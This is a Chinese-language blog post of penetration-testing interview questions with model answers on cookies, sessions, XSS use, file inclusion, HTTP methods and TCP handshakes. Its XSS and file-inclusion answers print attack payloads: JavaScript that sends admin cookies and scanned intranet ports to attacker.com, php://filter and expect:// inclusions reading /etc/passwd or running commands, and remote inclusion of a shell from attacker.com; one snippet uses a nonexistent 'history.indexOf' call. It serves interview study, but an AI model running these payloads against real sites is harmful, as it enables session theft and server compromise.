2025年渗透测试面试题总结-102(题目+回答)

安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。

目录

[🍪 1. Cookie属性详解](#🍪 1. Cookie属性详解)

[🔄 2. Cookie vs Session](#🔄 2. Cookie vs Session)

[🎯 3. 通过XSS获取Cookie后定位后台](#🎯 3. 通过XSS获取Cookie后定位后台)

[⚡ 4. 后台在内网时的XSS高阶利用](#⚡ 4. 后台在内网时的XSS高阶利用)

[🌐 5. HTTP请求方法及安全影响](#🌐 5. HTTP请求方法及安全影响)

[🔧 6. 核心专长领域](#🔧 6. 核心专长领域)

[📂 7. 无上传点的文件包含漏洞利用](#📂 7. 无上传点的文件包含漏洞利用)

[💻 8. 网络与系统原理掌握深度](#💻 8. 网络与系统原理掌握深度)

[🤝 9. TCP三次握手与标志位](#🤝 9. TCP三次握手与标志位)

复制代码
1、xss通常是用来获取cookie,关于cookie,你了解多少,有多少属性。
2、cookie和session有什么区别
3、假设有这样一个情景,你通过xss可以拿到管理员cookie,你如何知道后台在哪里
4、如果后台在内网里,你无法登录,那么你该怎么办。如何更大效率的利用这个xss
5、HTTP请求方式
6、擅长哪一块
7、有一个网站,存在文件包含漏洞。但是没有上传点。如果是你会怎么利用
8、网络原理,和系统原理这边你怎么样
9、tcp三次握手,标志位

🍪 1. Cookie属性详解

属性 作用 安全意义
HttpOnly 阻止JS通过document.cookie 读取 防御XSS窃取Cookie
Secure 仅通过HTTPS传输 防止网络嗅探
SameSite 控制跨站请求携带(Strict/Lax/None 防御CSRF
Domain 定义Cookie生效域名(如.example.com 允许子域名) 避免越域访问
Path 限制Cookie路径作用范围(如/admin 缩小攻击面
Expires/Max-Age 设置过期时间 控制会话生命周期
Partitioned 限制Cookie在分区存储(新兴属性) 防御Spectre等旁路攻击

🔄 2. Cookie vs Session

维度 Cookie Session
存储位置 客户端(浏览器) 服务端(内存/数据库)
安全性 低(可直接查看修改) 高(仅ID暴露)
生命周期 可长期保存 通常随浏览器关闭失效
性能影响 无服务端负担 需服务端存储和检索
典型场景 记住登录状态 敏感操作(如支付验证)

🎯 3. 通过XSS获取Cookie后定位后台

实战步骤:

  1. Cookie分析

    复制代码
    Javascript

    // XSS Payload提取管理员Cookie中的路径信息 fetch('https://attacker.com/log?cookie=' + document.cookie);

    • 检查Cookie中的Path属性(如Path=/admin
  2. 历史记录探测

    复制代码
    Javascript

    // 读取浏览器历史记录中可能的后台路径 for (let path of ['/admin', '/manage', '/wp-admin']) { if (history.indexOf(path) > -1) fetch('https://attacker.com/log?path='+path); }

  3. 页面链接扫描
    注入脚本遍历页面所有链接,匹配关键词:

    复制代码
    Javascript

    Array.from(document.getElementsByTagName('a')) .map(a => a.href) .filter(url => /admin|manage|backend/.test(url)) .forEach(url => fetch('https://attacker.com/log?url='+url));


⚡ 4. 后台在内网时的XSS高阶利用

当无法直接登录后台时的策略:

复制代码
Mermaid

graph TB A[XSS持久化] --> B[内网探测] A --> C[权限提升] B --> D[端口扫描] B --> E[服务指纹识别] C --> F[键盘记录] C --> G[钓鱼覆盖]

具体方法:

  • 内网资产测绘

    复制代码
    Javascript

    // 扫描内网常见服务 const ports = [80,443,8080,3306]; ports.forEach(port => { fetch(`http://192.168.1.1:${port}`, {mode: 'no-cors'}) .then(() => fetch(`https://attacker.com/log?ip=192.168.1.1&port=${port}_open`)) });

  • 反向代理建立
    注入代码创建WebSocket隧道,将内网流量转发至公网

  • 钓鱼覆盖攻击
    篡改页面内容伪造登录框,诱骗管理员输入二次认证凭证

  • 浏览器漏洞利用
    结合XSS触发浏览器0day(如CVE-2024-XXXX)获取系统权限


🌐 5. HTTP请求方法及安全影响

方法 用途 安全风险
GET 获取资源 URL参数暴露/缓存投毒
POST 提交数据 CSRF/参数污染
PUT 上传文件 任意文件上传漏洞
DELETE 删除资源 未授权资源删除
OPTIONS 探测服务器支持的方法 暴露敏感接口信息
TRACE 回显请求内容 导致XST(跨站追踪)攻击
PATCH 部分更新资源 逻辑漏洞导致数据篡改

🔧 6. 核心专长领域

网络安全三维能力矩阵:

复制代码
Mermaid

pie title 技术能力分布 "Web漏洞攻防" : 35 "内网渗透" : 30 "安全开发" : 25 "漏洞研究" : 10

  • Web漏洞攻防:精研SQLi/XSS/SSRF利用链构造及WAF绕过
  • 内网渗透:熟悉域渗透框架(ADIDNS/黄金票据)及隐蔽隧道
  • 安全开发:具备EXP工具链开发能力(Python/Go)

📂 7. 无上传点的文件包含漏洞利用

四大突破路径:

  1. PHP伪协议利用

    复制代码
    Url

    ?file=php://filter/convert.base64-encode/resource=/etc/passwd ?file=expect://id

  2. 日志注入攻击

    • 修改User-Agent为恶意代码
    • 包含日志文件:?file=/var/log/apache2/access.log
  3. 临时文件竞争

    复制代码
    Php

    // 结合文件上传临时文件竞争 ?file=/tmp/phpLTE0aG // 爆破临时文件名

  4. 远程协议加载

    复制代码
    Url

    ?file=http://attacker.com/shell.txt ?file=ftp://user:pass@attacker.com/cmd.php


💻 8. 网络与系统原理掌握深度

核心知识框架:

领域 掌握要点
网络协议 TCP/IP协议栈(三次握手/四次挥手)、ARP欺骗防御、DNS劫持检测
操作系统 Linux权限模型(SUID/SELinux)、Windows访问控制链(ACL)、进程注入技术
攻防对抗 防火墙绕过(分片重组)、IDS检测规则分析、内存攻击(堆喷射/ROP链)

🤝 9. TCP三次握手与标志位

交互流程:

复制代码
Mermaid

sequenceDiagram Client->>Server: SYN=1, Seq=x Server-->>Client: SYN=1, ACK=1, Seq=y, Ack=x+1 Client->>Server: ACK=1, Seq=x+1, Ack=y+1

标志位解析:

  • SYN:同步序列号(请求建立连接)
  • ACK:确认数据有效(响应请求)
  • RST:强制断开连接(异常处理)
  • FIN:正常结束连接(四次挥手)
  • PSH:要求接收方立即处理数据
  • URG:标识紧急数据(与URG指针配合)

安全关联:

  • SYN洪水攻击:伪造大量SYN包耗尽服务端资源
  • ACK扫描:通过响应判断主机状态(防火墙绕过)
相关推荐
ALex_zry20 小时前
C++20和C++23 在内存管理、并发控制和类型安全相关优化方式的详细技术分析
安全·c++20·c++23
是喵斯特ya20 小时前
数据库的权限提升
数据库·安全
日更嵌入式的打工仔21 小时前
Ethercat COE 笔记
网络·笔记·ethercat
UVM_ERROR1 天前
UVM实战:RDMA Host侧激励开发全流程问题排查与解决
服务器·网络·数据库
福尔摩斯张1 天前
插件式架构:解耦与扩展的艺术与实践(超详细)
linux·服务器·网络·网络协议·tcp/ip
网安_秋刀鱼1 天前
【java安全】shiro鉴权绕过
java·开发语言·安全
老王熬夜敲代码1 天前
网路编程--协议
linux·网络·笔记
北邮刘老师1 天前
智能体,超越人类与机器的世界“理解者”
网络·人工智能·大模型·智能体·智能体互联网
Dobby_051 天前
【k8s】集群安全机制(二):鉴权
运维·安全·kubernetes
智算菩萨1 天前
2025通用ChatGPT Agent架构综述:从工具调用、工作流编排到可观测与安全闭环
安全·chatgpt·架构